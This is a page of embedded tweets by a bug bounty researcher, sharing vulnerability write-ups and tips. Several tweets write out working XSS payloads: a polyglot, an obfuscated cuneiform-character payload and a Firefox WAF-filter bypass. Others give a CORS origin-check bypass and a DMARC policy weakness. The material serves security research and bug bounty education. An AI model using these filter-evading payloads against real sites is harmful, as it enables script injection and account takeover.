Contents
A write-up has been published about the CVE-2020-8512 discovered by me in +25.000 Icewarp Servers
— Lütfü Mert Ceylan (@lutfumertceylan) September 9, 2021
thanks to John Leyden & @jameswalk_er for this https://t.co/tfgmnzMbh1#bugbounty #cybersecurity
Top 25 Vulnerability Parameters based on frequency
— Lütfü Mert Ceylan (@lutfumertceylan) February 6, 2021
Vulnerable parameters including 𝗦𝗤𝗟𝗶, 𝗫𝗦𝗦, 𝗦𝗦𝗥𝗙, 𝗥𝗖𝗘, 𝗫𝗦𝗦, 𝗢𝗽𝗲𝗻 𝗥𝗲𝗱𝗶𝗿𝗲𝗰𝘁 that can be used in automation tools or manual recon. 🛡️🧙♂️https://t.co/D7j9jXfinM#bugbounty #bugbountytips #cybersecurity
a Javascript Polyglot for Cross-Site Scripting (XSS) 🛡️
— Lütfü Mert Ceylan (@lutfumertceylan) January 25, 2021
<video src=">" onerror=setTimeout`confirm\x281\x29`>
-unicoded chars
-DOM window
-uncommon tags for filters
-various mimics#bugbounty #bugbountytips #cybersecurity pic.twitter.com/d7mOadnFRq
Account Takeover via Web Cache Poisoning based Reflected XSS
— Lütfü Mert Ceylan (@lutfumertceylan) December 27, 2020
I wrote a write-up about combining Web Cache Poisoning with rXSS vulnerability. In this way, the impact has been escalated. 🧙♂️https://t.co/19UaCTiPqo#bugbounty #bugbountytips #cybersecurity
If you are curious about the working structure of this payload, you can find out with this tool. (thanks to @aemkei)https://t.co/RCvxWOiuoT pic.twitter.com/Hqa0myKfmQ
— Lütfü Mert Ceylan (@lutfumertceylan) December 14, 2020
an XSS payload, Cuneiform-alphabet based
— Lütfü Mert Ceylan (@lutfumertceylan) December 14, 2020
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()#bugbounty #bugbountytips #cybersecurity pic.twitter.com/dYFmWlEAR8
a Python Snippet to try Race Condition weakness in Turbo Intruder
— Lütfü Mert Ceylan (@lutfumertceylan) October 27, 2020
Source: https://t.co/bdf5EKQGqE#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity pic.twitter.com/VpuKF7DlQt
an XSS payload generated using JSfuck, for bypass attribute filters
— Lütfü Mert Ceylan (@lutfumertceylan) October 23, 2020
Source: https://t.co/8W2jok2ZvM#bugbounty #bugbountytips #bugbountytip #cybersecurity #infosec pic.twitter.com/hOORASpbcZ
an XSS payload to bypass some waf & filters in Firefox
— Lütfü Mert Ceylan (@lutfumertceylan) October 4, 2020
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking pic.twitter.com/YwxpP715Rq
I wrote a write-up about Clickjacking vulnerability. This vulnerability causes Account Takeover weakness. 🧙♂️🪄https://t.co/tkf72QfHop#bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec #bugbountytip
— Lütfü Mert Ceylan (@lutfumertceylan) September 27, 2020
I wrote a write-up about content spoofing vulnerability I found. This vulnerability could lead to users being manipulated. I know that this vulnerability is simply and very low impact. :) https://t.co/oLMVSyWbKW#bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec
— Lütfü Mert Ceylan (@lutfumertceylan) August 11, 2020
Informations after a simple Github research..
— Lütfü Mert Ceylan (@lutfumertceylan) July 27, 2020
Github is really like a black hole 🧙♂️#bugbounty #bugbountytips #cybersecurity #infosec pic.twitter.com/z9cX4FQE5p
🌋 Due to DMARC Functions, sp Parameter Weakness 🌋
— Lütfü Mert Ceylan (@lutfumertceylan) July 20, 2020
If the value of the sp parameter is "none", weakness occurs even if the value of p is not "none".
[email protected] --> Not Vulnerable
[email protected] --> Vulnerable#bugbounty #bugbountytips #bugbountytip #cybersecurity #infosec pic.twitter.com/4PJIwobMpj
🚀 How can you make a Javascript Polyglot for XSS? 🚀#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked pic.twitter.com/qmd3qUpQ2g
— Lütfü Mert Ceylan (@lutfumertceylan) July 17, 2020
I was included in the Hall of Fame (1st quarter) by Mozilla!🥳https://t.co/IpMxI18LCm#bugbounty #infosec #ethicalhacking #CyberSecurity #halloffame
— Lütfü Mert Ceylan (@lutfumertceylan) July 12, 2020
I writed a write-up about CORS vulnerability. This vulnerability causes both Account Takeover and Sensitive Data Leakage weakness. 🛡️🧙♂️https://t.co/zaoorAh1cD#bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec
— Lütfü Mert Ceylan (@lutfumertceylan) July 4, 2020
🛡️ CORS Protection Bypass 🛡️
— Lütfü Mert Ceylan (@lutfumertceylan) July 1, 2020
If the system only allows "Origin: https://t.co/YB5OiaWlDW",
Use a gTLD containing "com" -> Origin: https://t.co/S0FQ43tWro#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking